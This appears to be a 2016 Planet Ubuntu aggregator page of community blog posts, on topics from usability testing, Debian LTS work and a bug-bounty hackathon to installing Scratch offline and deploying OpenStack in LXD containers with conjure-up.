The Lubuntu team needs your feedback! We would like to get your input on a poll we have created to gauge your usage of the Lubuntu images. Your feedback is essential in making sure we make the right decision going forward! The poll is located here: http://lubuntu.me/cd-size-poll/ The poll closes on 26 August 2016 at […]

18 August, 2016 01:16AM

August 17, 2016

Canonical Design Team: What is the best way to display online status? We tested it

Recently I have been working on the visual design for RCS (which stands for rich communications service) group chat. While working on the “Group Info” screen, we found ourselves wondering what the best way to display an online/offline status. Some of us thought text would be more explicit but others thought  it adds more noise to the screen. We decided that we needed some real data in order to make the best decision.

Usually our user testing is done by a designated Researcher but usually their plates are full and projects bigger, so I decided to make my first foray into user testing. I got some tips from designers who had more experience with user testing on our cloud team; Maria  Vrachni, Carla Berkers and Luca Paulina.

I then set about finding my user testing group. I chose 5 people to start with because you can uncover up to 80% of usability issues from speaking to 5 people. I tried to recruit a range of people to test with and they were:

  1. Billy: software engineer, very tech savvy and tech enthusiast.
  2. Magda: Our former PM and very familiar with our product and designs.
  3. Stefanie: Our Office Manager who knows our products but not so familiar with our designs.
  4. Rodney: Our IS Associate who is tech savvy but not familiar with our design work
  5. Ben: A copyeditor who has no background in tech or design and a light phone user.

The tool I decided to use was Invision. It has a lot of good features and I already had some experience creating lightweight prototypes with it. I made four minimal prototypes where the group info screen had a mixture of dots vs text to represent online status and variations on placement.  I then put these on my phone so my test subjects could interact with it and feel like they were looking at a full fledged app and have the same expectations.

group_chat_testing

During testing, I made sure not to ask my subjects any leading questions. I only asked them very broad questions like “Do you see everything you expect to on this page?” “Is anything unclear?” etc. When testing, it’s important not to lead the test subjects so they can be as objective as possible. Keeping this in mind, it was interesting to to see what the testers noticed and brought up on their own and what patterns arise.

My findings were as follows:

Online status: Text or Green Dot

Unanimously they all preferred online status to be depicted with colour and 4 out of 5 preferred the green dot rather than text because of its scannability.

Online status placement:

This one was close but having the green dot next to the avatar had the edge, again because of its scannability. One tester preferred the dot next to the arrow and another didn’t have a preference on placement.

Pending status:

What was also interesting is that three out of the four thought “pending” had the wrong placement. They felt it should have the same placement as online and offline status.

Overall, it was very interesting to collect real data to support our work and looking forward to the next time which will hopefully be bigger in scope.

group_chat_final

The finished design

17 August, 2016 03:57PM

Jono Bacon: Join My Reddit AMA – 30th August 2016 at 9am Pacific

On Tuesday 30th August 2016 at 9am Pacific (see other time zone times here) I will be doing a Reddit AMA about my work in community strategy, management, developer relations, open source, music, and elsewhere.

Screen Shot 2016-08-16 at 10.45.40 PM

For those unfamiliar with Reddit AMAs, it is essentially a way in which people can ask questions that someone will respond to. You simply add your questions (serious, or fun both welcome!) and I will respond to as many as I can.

It has been a while since my last AMA, so I am looking forward to this one.

Feel free to ask any questions you like, and this could include questions that relate to:

  • Community management, leadership, and best practice.
  • Working at Canonical, GitHub, XPRIZE, and elsewhere.
  • The open source industry, how it has changed, and what the future looks like.
  • The projects I have been involved in such as Ubuntu, GNOME, KDE, and others.
  • The driving forces behind people and groups, behavioral economics, etc.
  • My other things such as my music, conferences, writing etc.
  • Anything else – politics, movies, news, tech…ask away!

If you want to ask about something else though, go ahead! 🙂

How to Join

Joining the AMA is simple. Just follow these steps:

  • Be sure to have a Reddit account. If you don’t have one, head over here and sign up.
  • On Tuesday 30th August 2016 at 9am Pacific (see other time zone times here) I will share the link to my AMA on Twitter (I am not allowed to share it until we run the AMA). You can look for this tweet by clicking here.
  • Click the link in my tweet to go to the AMA and then click the text box to add your question(s).
  • Now just wait until I respond. Feel free to follow up, challenge my response, and otherwise have fun!

Simple as that. 🙂

A Bit of Background

For those of you unfamiliar with my work, you can read more here, but here is a quick summary:

  • I run a community strategy/management and developer relations consultancy practice.
  • My clients include Deutsche Bank, HackerOne, data.world, Intel, Sony Mobile, Open Networking Foundation, and others.
  • I previously served as director of community for GitHub, Canonical, and XPRIZE.
  • I serve as an advisor to various organizations including Open Networking Foundation, Mycroft AI, Mod Duo, and Open Cloud Consortium.
  • I wrote The Art of Community and have columns for Forbes and opensource.com. I have also written four other books and hundreds of articles.
  • I have been involved with various open source projects including Ubuntu, GNOME, KDE, Jokosher, and others.
  • I am an active podcaster, previously with LugRadio and Shot of Jaq, and now with Bad Voltage.
  • I am really into music and have played in Seraphidian and Severed Fifth.

So, I hope you manage to make it over to the AMA, ask some fun and interesting questions, and we can have a good time. Thanks!

The post Join My Reddit AMA – 30th August 2016 at 9am Pacific appeared first on Jono Bacon.

17 August, 2016 03:00PM

Raphaël Hertzog: Freexian’s report about Debian Long Term Support, July 2016

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In July, 136.6 work hours have been dispatched among 11 paid contributors. Their reports are available:

  • Antoine Beaupré has been allocated 4 hours again but in the end he put back his 8 pending hours in the pool for the next months.
  • Balint Reczey did 18 hours (out of 7 hours allocated + 2 remaining, thus keeping 2 extra hours for August).
  • Ben Hutchings did 15 hours (out of 14.7 hours allocated + 1 remaining, keeping 0.7 extra hour for August).
  • Brian May did 14.7 hours.
  • Chris Lamb did 14 hours (out of 14.7 hours, thus keeping 0.7 hours for next month).
  • Emilio Pozuelo Monfort did 13 hours (out of 14.7 hours allocated, thus keeping 1.7 hours extra hours for August).
  • Guido Günther did 8 hours.
  • Markus Koschany did 14.7 hours.
  • Ola Lundqvist did 14 hours (out of 14.7 hours assigned, thus keeping 0.7 extra hours for August).
  • Santiago Ruano Rincón did 14 hours (out of 14.7h allocated + 11.25 remaining, the 11.95 extra hours will be put back in the global pool as Santiago is stepping down).
  • Thorsten Alteholz did 14.7 hours.

Evolution of the situation

The number of sponsored hours jumped to 159 hours per month thanks to GitHub joining as our second platinum sponsor (funding 3 days of work per month)! Our funding goal is getting closer but it’s not there yet.

The security tracker currently lists 22 packages with a known CVE and the dla-needed.txt file likewise. That’s a sharp decline compared to last month.

Thanks to our sponsors

New sponsors are in bold.

2 comments | Liked this article? Click here. | My blog is Flattr-enabled.

17 August, 2016 02:45PM

Raphaël Hertzog: My Free Software Activities in July 2016

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donators (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

DebConf 16

I was in South Africa for the whole week of DebConf 16 and gave 3 talks/BoF. You can find the slides and the videos in the links of their corresponding page:

I was a bit nervous about the third BoF (on using Debian money to fund Debian projects) but discussed with many persons during the week and it looks like the project evolved quite a bit in the last 10 years and while it’s still a sensitive topic (and rightfully so given the possible impacts) people are willing to discuss the issues and to experiment. You can have a look at the gobby notes that resulted from the live discussion.

I spent most of the time discussing with people and I did not do much technical work besides trying (and failing) to fix accessibility issues with tracker.debian.org (help from knowledgeable people is welcome, see #830213).

Debian Packaging

I uploaded a new version of zim to fix a reproducibility issue (and forwarded the patch upstream).

I uploaded Django 1.8.14 to jessie-backports and had to fix a failing test (pull request).

I uploaded python-django-jsonfield 1.0.1 a new upstream version integrating the patches I prepared in June.

I managed the (small) ftplib library transition. I prepared the new version in experimental, ensured reverse build dependencies do still build and coordinated the transition with the release team. This was all triggered by a reproducible build bug that I got and that made me look at the package… last time upstream had disappeared (upstream URL was even gone) but it looks like he became active again and he pushed a new release.

I filed wishlist bug #832053 to request a new deblog command in devscripts. It should make it easier to display current and former build logs.

Kali related Debian work

I worked on many issues that were affecting Kali (and Debian Testing) users:

  • I made an open-vm-tools NMU to get the package back into testing.
  • I filed #830795 on nautilus and #831737 on pbnj to forward Kali bugs to Debian.
  • I wrote a fontconfig patch to make it ignore .dpkg-tmp files. I also forwarded that patch upstream and filed a related bug in gnome-settings-daemon which is actually causing the problem by running fc-cache at the wrong times.
  • I started a discussion to see how we could fix the synaptics touchpad problem in GNOME 3.20. In the end, we have a new version of xserver-xorg-input-all which only depends on xserver-xorg-input-libinput and not on xserver-xorg-input-synaptics (no longer supported by GNOME). This is after upstream refused to reintroduce synaptics support.
  • I filed #831730 on desktop-base because KDE’s plasma-desktop is no longer using the Debian background by default. I had to seek upstream help to find out a possible solution (deployed in Kali only for now).
  • I filed #832503 because the way dpkg and APT manages foo:any dependencies when foo is not marked “Multi-Arch: allowed” is counter-productive… I discovered this while trying to use a firefox-esr:any dependency. And I filed #832501 to get the desired “Multi-Arch: allowed” marker on firefox-esr.

Thanks

See you next month for a new summary of my activities.

3 comments | Liked this article? Click here. | My blog is Flattr-enabled.

17 August, 2016 10:53AM

hackergotchi for Univention Corporate Server

Univention Corporate Server

UCC 3.0 released: Switch from Kubuntu to Ubuntu

This week we have published version 3.0 of Univention Corporate Client (UCC) our desktop solution for the operation and administration of PCs, notebooks and thin clients. An essential change in comparison to previous releases is the change of the technical basis from Kubuntu to Ubuntu. Our reason for this switch was that Ubuntu offers longer support terms (5 years) for the Long Term Support (LTS) Versions. Kubuntu 16.04 LTS only offers support for 3 years. Customers thus profit from a longterm support for UCC. With this switch the desktop environment was also changed from KDE to Unity. Unity was especially developed for Ubuntu by Canonical. To achieve a better overview of all UCC images installed in one environment, all actually installed client images will be reported to Univention Corporate Server (UCS) from now on. As UCS is the central identity management system for UCC, these images will then be displayed for easy search in UCS.

Ubuntu Logo
UCC 3.0 will be available as a desktop image and a thin client image. The thin client version will continue to be available as a 32 and 64 bit version. The desktop image of UCC will only be available as a 64 bit version. Univention thus adapts its product strategy to the changed user behaviour as by now mostly 64 bit desktops are requested.

Some of the new features were originally developed for individual customers and help to increase the convenience significantly. These include, among other features, the function to define device names which shall not be embedded automatically into the system as it is usually the case. This feature facilitates the compatibility with „exotic hardware“. In addition, the defined policies on a server will also be saved locally with each start of UCC. This way the policies will still exist even if a client gets temporarily deconnected from the central LDAP server. Furthermore, clients will be able to recognise interim changes of their position in the LDAP directory and therefore will not need to rejoin the domain.

One further practical extension: Administrators can now temporarily add write rights to a running UCC read-only image to carry out system changes which will persist even after the switch back to the read-only mode has occurred through a system reboot. The tool Home-Mounter for the mounting of network drives via CIFS was removed. Instead interfaces have been created in UCC 3.0 which can be accessed by external tools.

Univention Corporate Client can be administrated via the web-based Univention Management Console (UMC) of Univention Corporate Server. It comes with an integral user and authorization management for policies and desktop profiles. Through the automated software distribution and the option to organize desktops in a directory tree, administrative effort are reduced. UCC is especially deployed in larger organizations and the educational sector as a cost-efficient client solution.

You may find former information about UCC in the release notes or on the product website.

Der Beitrag UCC 3.0 released: Switch from Kubuntu to Ubuntu erschien zuerst auf Univention.

17 August, 2016 09:14AM by Alice Horstmann

August 16, 2016

hackergotchi for Ubuntu developers

Ubuntu developers

Jono Bacon: Cutting the Cord With Playstation Vue

We just cut the cord, and glory is ours. I thought I would share how we did it to provide food for thought for those of you sick of cable (and maybe so people can stop bickering on my DirecTV blog post from years back).

Photo on 8-16-16 at 2.12 PM

I will walk through the requirements we had, what we used to have, and what the new setup looks like.

Requirements

The requirements for us are fairly simple:

  • We want access to a core set of channels:
    • Comedy Central
    • CNN
    • Food Network
    • HGTV
    • Local Channels (e.g. CBS, NBC, ABC).
  • Be able to favorite shows and replay them after they have aired.
  • Have access to streaming channels/services:
    • Amazon Prime
    • Netflix
    • Crackle
    • Spotify
    • Pandora
  • Be able to play Blu-ray discs, DVDs, and other optical content. While we rarely do this, we want the option.
  • Have a reliable Internet connection and uninterrupted service.
  • Have all of this both in our living room and in our bedroom.
  • Reduce our costs.
  • Bonus: access some channels on mobile devices. Sometimes I would like to watch the daily show or the news while on the elliptical on my tablet.

Previous Setup

Our previous setup had most of these requirements in place.

For TV we were with DirecTV. We had all of the channels that we needed and we could record TV downstairs but also replay it upstairs in the bedroom.

We have a Roku that provides the streaming channels (Netflix, Amazon Prime, Crackle, Spotify, and Pandora).

We also have a cheap Blueray player which while rarely used, does come in handy from time time.

Everything goes into Pioneer Elite amp and I tried to consolidate the remotes with a Logitech Harmony but it broke immediately and I have heard from others the quality is awful. As such, we used a cheaper all in one remote which could do everything except the Roku as that is bluetooth.

The New Setup

At the core of our new setup is a Playstation 4. I have actually had this for a while but it has been sat up in my office and barely used.

Photo on 8-16-16 at 2.10 PM

The Playstation 4 provides the bulk of what we need:

  • Amazon Prime, Netflix, and Spotify. I haven’t found a Pandora app yet, but this is fine.
  • Blueray playback.
  • Obviously we have the additional benefit of now being able to play games downstairs. I am enjoying having a blast on Battlefield from time to time and I installed some simple games for Jack to play on.

For the TV we are using Playstation Vue. This is a streaming service that has the most comprehensive set of channels I have seen so far, and the bulk of what we wanted is in the lowest tier plan ($40/month). I had assessed some other services but key channels (e.g. Comedy Central) were missing.

Photo on 8-16-16 at 2.14 PM

Playstation Vue has some nice features:

  • It is a lot cheaper. Our $80+/month cable bill has now gone down to $40/month with Vue.
  • The overall experience (e.g. browsing the guide, selecting shows, viewing information) is far quicker, more modern, and smoother than the clunky old DirecTV box.
  • When browsing the guide you can not just watch live TV but also watch previous shows that were on too. For example, missed The Daily Shows this week? No worries, you can just go back and watch them.
  • Playstation Vue is also available on Android, IOS, Roku and other devices which means I can watch TV and play back shows wherever I am.

In terms of the remote control I bought the official Playstation 4 remote and it works pretty well. It is still a little clunky in some areas as the apps on the Playstation sometimes refer to the usual playstation buttons as opposed to the buttons on the remote. Overall though it works great and it also powers my other devices (e.g. TV and amp), although I couldn’t get volume pass-through working.

Networking wise, we have a router upstairs in the bedroom which is where the feed comes in. I then take a cable from it and send it over our power lines with a Ethernet Over Power adapter. Then, downstairs I have an additional router which is chained and I take ethernet from the router to the Playstation. This results in considerably more reliable performance than using wireless. This is a big improvement as the Roku doesn’t have an ethernet port.

In Conclusion

Overall, we love the new setup. The Playstation 4 is a great center-point for our entertainment system. It is awesome having a single remote, everything on one box and in one interface. I also love the higher-fidelity experience – the Roku is great but the interface looks a little dated and the apps are rather restricted.

Playstation Vue is absolutely awesome and I would highlight recommend it for people looking to ditch cable. You don’t even need a Playstation 4 – you can use it on a Roku, for example.

I also love that we are future proofed. I am planning on getting Playstation VR, which will now work downstairs, and Sony are bringing more and more content and apps to the Playstation Store. For example, there are lots of movies, TV shows, and other content which may not be available elsewhere.

I would love to hear your stories though about your cord cutting. Which services and products did you move to? What do you think about a games console running your entertainment setup? What am I doing wrong? Let me know in the comments!

The post Cutting the Cord With Playstation Vue appeared first on Jono Bacon.

16 August, 2016 09:27PM

Ubuntu Insights: Intel® Joule™ board powered by Ubuntu Core

intel-joule-1-2x1

We’re happy to welcome a new development board in the Ubuntu family! The new Intel® Joule™ is a powerful board targeted at IoT and robotics makers and runs Ubuntu for a smooth development experience. It’s also affordable and compact enough to be used in deployment, therefore Ubuntu Core can be installed to make any device it’s included in secure and up to date … wherever it is!

Check out this Robot Demo that was filmed pre-IDF – The Turtlebot runs ROS on Ubuntu using the Intel® Joule™ board and Realsense camera.

Ubuntu Core, also known as Snappy, is a stripped down version of Ubuntu, designed to run securely on autonomous machines, devices and other internet-connected digital things. From homes to drones, these devices are set to revolutionise many aspects of our lives, but they need an operating system that is different from that of traditional PCs. Learn more about Ubuntu Core here.

Get involved in contributing to Ubuntu Core here.

16 August, 2016 07:06PM

Ubuntu Insights: Advantech and Canonical Form Strategic Partnership for IoT Gateways

2010 Logo with Slogan

Ubuntu Core operating system provides production ready platform for gateways.

London, UK – August 16, 2016 – Canonical today announced it has formed a strategic partnership with Advantech to work together to certify the company’s Internet of Things (IoT) gateways for Ubuntu Core.

The partnership ensures users of Advantech’s selected Intel x86-based IoT gateways are certified to have a fully functioning and supported Ubuntu image for their gateway. Users will also have access to an Ubuntu image and developer tools to ready their devices for production, as well as a number of services to fully manage their device’s security and software.

“We are extremely pleased to be forming this strategic partnership with Advantech, one of the world’s leaders in providing trusted innovative embedded and automation products and solutions,” said Jon Melamut, vice president of commercial devices operations for Canonical. “This partnership confirms Ubuntu Core as the operating system of choice for IOT developers and systems integrators who want to deploy products to market quickly. Ubuntu Core is Ubuntu for IoT and it provides amongst others, a production ready operating system for IoT gateways.”

“Advantech aims to provide a full range of IoT gateways with pre-integrated software to fulfill the needs of diverse IoT applications. We are very pleased with our collaboration with Canonical and the expansion of our operating system offerings. This collaboration will enable us to satisfy even more customer requirements and deliver an integrated, pre-validated, and flexible open-computing gateway platform that allows fast solution development and deployment,” said Miller Chang, vice president of Advantech Embedded Computing Group.

Canonical is the company behind Ubuntu, the world’s most popular open-source platform, while Advantech is the leader in providing trusted innovative embedded and automation products and solutions.

For more information on Ubuntu Core, please visit here.

About Canonical
Canonical is the company behind Ubuntu, the leading Operating System for cloud and the Internet of Things. Most public cloud workloads are running Ubuntu, and most new smart gateways, self-driving cars and advanced humanoid robots are running Ubuntu as well. Canonical provides enterprise support and services for commercial users of Ubuntu.

Canonical leads the development of the snap universal Linux packaging system for secure, transactional device updates and app stores. Ubuntu Core is an all-snap OS, perfect for devices and appliances. Established in 2004, Canonical is a privately held company.

About Advantech
Founded in 1983, Advantech is a leader in providing trusted, innovative products, services, and solutions. Advantech offers comprehensive system integration, hardware, software, customer-centric design services, embedded systems, automation products, and global logistics support. We cooperate closely with our partners to help provide complete solutions for a wide array of applications across a diverse range of industries. Our mission is to enable an intelligent planet with Automation and Embedded Computing products and solutions that empower the development of smarter working and living. With Advantech, there is no limit to the applications and innovations our products make possible. Advantech is a premier member of the Intel® Internet of Things Solutions Alliance. From modular components to market-ready systems, Intel and the 350+ global member companies of the Alliance provide scalable, interoperable solutions that accelerate deployment of intelligent devices and end-to-end analytics. Close collaboration with Intel and each other enables Alliance members to innovate with the latest technologies, helping developers deliver first-in-market solutions. (Corporate Website: www.advantech.com).

16 August, 2016 01:26PM

August 15, 2016

The Fridge: Ubuntu Weekly Newsletter Issue 478

Welcome to the Ubuntu Weekly Newsletter. This is issue #478 for the week August 8 – 14, 2016, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Athul Muralidhar
  • Chris Sirrs
  • Paul White
  • Simon Quigley
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

15 August, 2016 09:22PM

Canonical Design Team: Convergent terminal

We have been looking at ways of making the Terminal app more pleasing, in terms of the user experience, as well as the visuals.

I would like to share the work so far, invite users of the app to comment on the new designs, and share ideas on what other new features would be desirable.

On the visual side, we have brought the app in line with our Suru visual language. We have also adopted the very nice Solarized palette as the default palette – though this will of course be completely customisable by the user.

On the functionality side we are proposing a number of improvements:

-Keyboard shortcuts
-Ability to completely customise touch/keyboard shortcuts
-Ability to split the screen horizontally/vertically (similar to Terminator)
-Ability to easily customise the palette colours, and window transparency (on desktop)
-Unlimited history/scrollback
-Adding a “find” action for searching the history

email-desktop

Tabs and split screen

On larger screens tabs will be visually persistent. In addition it’s desirable to be able split a panel horizontally and vertically, and use keyboard shortcuts or focusing with a mouse/touch to move between the focused panel.

On mobile, the tabs will be accessed through the bottom edge, as on the browser app.

terminal-blog-phone

Quick mobile access to shortcuts and commands

We are discussing the option of having modifier (Ctrl, Alt etc) keys working together with the on-screen keyboard on touch – which would be a very welcome addition. While this is possible to do in theory with our on-screen keyboard, it’s something that won’t land in the immediate near future. In the interim modifier key combinations will still be accessible on touch via the shortcuts at the bottom of the screen. We also want to make these shortcuts ordered by recency, and have the ability to add your own custom key shortcuts and commands.

We are also discussing with the on-screen keyboard devs about adding an app specific auto-correct dictionary – in this case terminal commands – that together with a swipe keyboard should make a much nicer mobile terminal user experience.

email-desktop

More themability

We would like the user to be able to define their own custom themes more easily, either via in-app settings with colour picker and theme import, or by editing a JSON configuration file. We would also like to be able to choose the window transparency (in windowed mode), as some users want a see-through terminal.

We need your help!

These visuals are work in progress – we would love to hear what kind of features you would like to see in your favourite terminal app!

Also, as Terminal app is a fully community developed project, we are looking for one or two experienced Qt/QML developers with time to contribute to lead the implementation of these designs. Please reach out to alan.pope@canonical.com or jouni.helminen@canonical.com to discuss details!

EDIT: To clarify – these proposed visuals are improvements for the community developed terminal app currently available for the phone and tablet. We hope to improve it, but it is still not as mature as older terminal apps. You should still be able to run your current favourite terminal (like gnome-terminal, Terminator etc) in Unity8.

15 August, 2016 04:24PM

Jonathan Riddell: Neon News: Frameworks 5.25, Kontact in Dev Editions, Maui bases on Neon

Things move fast in the land of Neon light.

Today KDE Frameworks 5.25 was added to Neon User edition.  KDE’s selection of Qt addon libraries gets released every month and this update comes with a bunch of fixes.

Finally Kontact has built in Developer Editions, apologies to those who had a half installed build for a while, you should now be able to install all of KDE PIM and get your e-mail/calendar/notes/feed reader/a load of other bits.  Suggestions now taken for what I should add next to Neon builds.

And in free software you are nobody until somebody bases their project off yours.  Yesterday Maui Linux released its new version based off KDE neon.  Maui was previously the distro used for Hawaii Qt Desktop but now it’s Plasma all the way and comes from the Netrunner team with a bunch of customisations for those who don’t appreciate Neon’s minimalist default install.

Maui Linux based off Neon
Facebooktwittergoogle_pluslinkedinby feather

15 August, 2016 03:41PM

Jono Bacon: Running a Hackathon for Security Hackers

A few weeks ago I flew out to Las Vegas with HackerOne to help run an event we had been working on for a while called H1-702. It was a hackathon designed for some of the world’s most talented security hackers.

H1-702 was one piece in a picture to ensure HackerOne is the very best platform and community for hackers to hack, learn, and grow.

This was the event that we invite the cream of the crop to…hackers who have been doing significant and sustained work and who have delivered some awesome vulnerability reports.

20160804_165520

Hacking For Fun and Profit

For the event we booked a MGM Grand Skyloft for three evenings. We invited the most prolific hackers on HackerOne to join us where they would be invited to hack on a specific company’s technology each night. They didn’t learn about which company it was until the evening they arrived…this kept a bit of mystery in the air. 😉

The first night had Zenefits, the second Snapchat, and the third Panasonic Avionics. This was a nice mixture of web, mobile, and embedded.

20160804_183128

Each evening Hackers were provided with the scope and then invited to hack these different products and submit vulnerabilities. Each company had their security team and developers on-hand where they would be able to answer questions, review and confirm reports quickly (and then fix the issues.)

Confirmed reports would result in a payout from the company and reputation points. This would then bump the hacker higher up on the H1-702 leaderboard and closer to winning the prestige of H1-702 Most Valued Hacker, complete with a pretty badass winners belt. As you can imagine, things got a little competitive. 😉

20160804_165509

Each evening kicked off at around 7pm – 8pm and ran until the wee hours. The first night, for example, I ended up heading to bed at around 5.30am and they were still going.

There was an awesome electricity in the air and these hackers really brought their A-game. Lots of hackers walked out the door having made thousands of dollars for an evening’s hacking.

While competitive, it was also social, with people having a good time and getting to know each other. Speaking personally, it was great to meet some hackers who I have been following for a while. It was a thrill to watch them work.

Taking Care of Your Best

In every community you always get a variance of quality and commitment. Some people will be casual contributors and some will invest significant time and energy in the community and their work. It is always critical to really take care of your best, and H1-702 was one way in how want to do this at HackerOne.

Given this, we wanted deliver a genuinely premium event for these hackers and ensure that everyone received impeccable service and attention, not just at the event but from the minute they arrived in Vegas. After all, they have earned it.

20160804_184037

This was an exercise in detail. We ensured we had a comfortable event space in a cool hotel. We had oodles of booze, with some top-shelf liquor. We provided food throughout the evening and brought in-chair massages later in the night to re-invigorate everyone. We provided plenty of seating, both in quiet and noisier spaces, lots of power sockets and we worked to have fast and reliable Internet. We provided each hacker with a HackerOne backpack, limited edition t-shirts, and other swag such as H1-702 challenge coins. We ensured that there was always someone hackers could call to solve problems, and we were receptive to feedback each night to improve it the following night.

Throughout the evening we worked to cater to the needs of hackers. We had members of HackerOne helping hackers solve problems, keep everyone hydrated and fed, and having a good time. HackerOne CEO Mårten Mickos was also running around like a waiter (amusingly with a white towel) ensuring everyone had drinks in their hands.

Overall, it was a fun event and while it went pretty well, there is always plenty to learn and improve for next time. If this sounds like fun, be sure to go and sign up and hack on some programs and earn a spot next year.

The post Running a Hackathon for Security Hackers appeared first on Jono Bacon.

15 August, 2016 03:00PM

hackergotchi for Emmabuntüs Debian Edition

Emmabuntüs Debian Edition

The march of the YovoTogo children toward the digital age

With a population of 7.5 million inhabitants and an area of 56,785 Km2, the Togolese republic is a Western Africa country which economy is based mainly on food crops and phosphate mines. Its true wealth is the wide variety of landscapes going from arid plains to green valleys, passing through great savannas in the north [...]

15 August, 2016 01:45PM by yves

hackergotchi for Ubuntu developers

Ubuntu developers

Cesar Sevilla: Scratch, un Software interesante

Hola a todos, después de tanto tiempo me he permitido escribir este artículo como propósito de compartir una experiencia vivida hace poco a través de un programa de formación presentado por www.zuliatec.com llamado Procodi www.procodi.com, programa de formación para niños donde les brinda desde muy temprana edad herramientas que les permiten a ellos desarrollar habilidades y destreza en las áreas de desarrollo, diseño gráfico, Electrónica Digital, Robótica, Medios digitales y música digital.

Scratch (Cómo lo dice su misma página web), está diseñado especialmente para edades entre los 8 y 16 años, pero es usado por personas de todas las edades. Millones de personas están creando proyectos en Scratch en una amplia variedad de entornos, incluyendo hogares, escuelas, museos, bibliotecas y centros comunitarios.

También cita: La capacidad de codificar programas de computador es una parte importante de la alfabetización en la sociedad actual. Cuando las personas aprenden a programar en Scratch, aprenden estrategias importantes para la solución de problemas, diseño de proyectos, y la comunicación de ideas.

Dado a que es muy provechoso esta herramienta tanto para niños como para los adultos me dedico a explicarle de una manera sencilla como hacer funcionar el programa desde GNU/Linux de manera OffLine.

Si usas Gnome o derivado es necesario tener instalado una librería que tiene como nombre Gnome-Keyring y si usas KDE debes tener instalado Kde-Wallet.

Para este ejemplo explico como hacer funcionado Scratch para Linux Mint y que puede servir para S.O derivados para Debian.

  1. Descarga primero desde la web oficial de Scratch https://scratch.mit.edu/scratch2download/ los archivos para instalar Adobe Air y Scratch para Linux, también está disponible para Windows y para Mac.
  2. Luego instalar gnome-keyring: sudo aptitude install gnome-keyring
  3. Agregar dos enlaces simbólicos a la carpeta /usr/lib/ de la siguiente manera: sudo ln -s /usr/lib/i386-linux-gnu/libgnome-keyring.so.0 /usr/lib/libgnome-keyring.so.0 && sudo ln -s /usr/lib/i386-linux-gnu/libgnome-keyring.so.0.2.0 /usr/lib/libgnome-keyring.so.0.2.0
  4. Luego te posiciones desde la consola donde se encuentre el instalador de Adobe Air, y desde allí ejecutar lo siguiente: chmod +x AdobeAIRInstaller.bin && ./AdobeAIRInstaller.bin
  5. Sigue todos los pasos que te indique el instalador y ten un poco de paciencia.
  6. Ya instalado el Adobe Air, buscamos gráficamente el archivo Scratch-448.air y lo abrimos con Adobe AIR application Instaler. También hay que tener un poco de paciencia, pero al terminar te generará un enlace en tu escritorio donde podrás acceder al sistema las veces que desees.

Con lo ante expuesto ya podemos utilizar Scratch OffLine, pero recuerda que si entraste en la web oficial del proyecto pudiste haber notado que también lo podemos utilizar en linea.

Happy Hacking.


15 August, 2016 11:03AM

Ubuntu Insights: Lunch & Learn with OpenStack Containers

Follow the instructions in this article to spend around an hour over your lunch time to get an entire Ubuntu OpenStack cloud up and running in containers on a single machine. The resulting cloud will launch container based workloads.

8740446897_2c27cf6dd3_b
News about containers with OpenStack is everywhere right now. Be it OpenStack running on containers, running containers in OpenStack, orchestrating containers across multiple clouds including OpenStack or setting up networking for containers within OpenStack, there is much a buzz. Some of it many OpenStack distributions have been making extensive use of containers to run OpenStack services for well over 12 months. Canonical is no exception and was one of the first distributions to deploy OpenStack services in containers. It is now really easy to setup a real (i.e not DevStack) cloud on a single machine that is 100% container based.

Pre-requisites

Desktop, laptop, server or VM with 16B RAM and 50Gb disk space available, running Ubuntu 16.04

Note we recommend using the Ubuntu Desktop edition for testing as it will allow you to access Horizon from a browser without the need to setup external networking or dealing with ssh tunnels and port forwarding.

Instructions

First, make sure 16.04 is up to date:

$ sudo apt update
$ sudo apt upgrade

This should bring everything up to date.

Now install zfs and lxd:

$ sudo apt install zfs lxd

and reboot

$ sudo reboot

Next, setup lxd to use zfs:

$ sudo lxd init

This will ask a number of questions, recommended answers are in bold:

Name of the storage backend to use (dir or zfs): zfs
Create a new ZFS pool (yes/no)? yes
Name of the new ZFS pool: OpenStack
Would you like to use an existing block device (yes/no)? no
Size in GB of the new loop device (1GB minimum): 50
Would you like LXD to be available over the network (yes/no)? no
Do you want to configure the LXD bridge (yes/no)? yes

This will launch a ncurses interface to setup LXD networking

conjure-up-1
Hit return to accept the defaults until you see

conjure-up-6
Given we just want to this up on our own, internal environment we can skip IPV6 for now so select No and then hit return. This will drop you back out to the bash prompt.

Now we need to get lxd running and the network bridge loaded:

$ lxc finger
$ lxc list

This will give some output along the lines of:

Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04

+------+-------+------+------+------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+------+-------+------+------+------+-----------+

Next, add a repository to grab the latest conjure-up packages:

$ sudo apt-add-repository ppa:conjure-up/next

Likewise for Juju:

$ sudo apt-add-repository ppa:juju/devel

Update our repos once more:

$ sudo apt update

Install the conjure-up package:

$ sudo apt install conjure-up

This will install quite a few things including juju and may take a few minutes, when it finishes you can get going installing OpenStack with:

$ conjure-up openstack

This will launch ncurses interface to setup OpenStack

conjure-up-7
Select localhost as the target as we want to set it all up locally and then select ‘OpenStack with Nova-LXD’

As the install requires Ceph you will now be asked a question about the number of Ceph Units you want to run.

conjure-up-9
Select the option [ Deploy all 14 Remaining Applications with Bundle Defaults ]

On the final screen hit ‘Continue’ and you should be installing. Depending on your hardware this could take anywhere between 30 and 60 mins. Now is a great time to eat your lunch whilst watching the progress.

Once the services are deployed, you will be asked a number of questions:

conjure-up-12

  • Import glance images – yes
  • Import SSH keypairs – recommended if you have an ssh key.
  • Configure OpenStack networking – required if you wish to be able to access the running guest instances from the outside world.
  • Configure Horizon – yes

Do not hit “View Summary” just yet – you need to wait until each of the hour glasses next to the questions turns green. Only once you have 5 green lights should you hit [View Summary] as below:

conjure-up1.2

Once complete you will be presented with a url and username/password combination to login to Horzion. We need to ensure that Horizon is accessible form the outside world:


$ juju expose openstack-dashboard

Then

$ juju status openstack-dashboard

Make sure that the service is exposed and copy its ip address

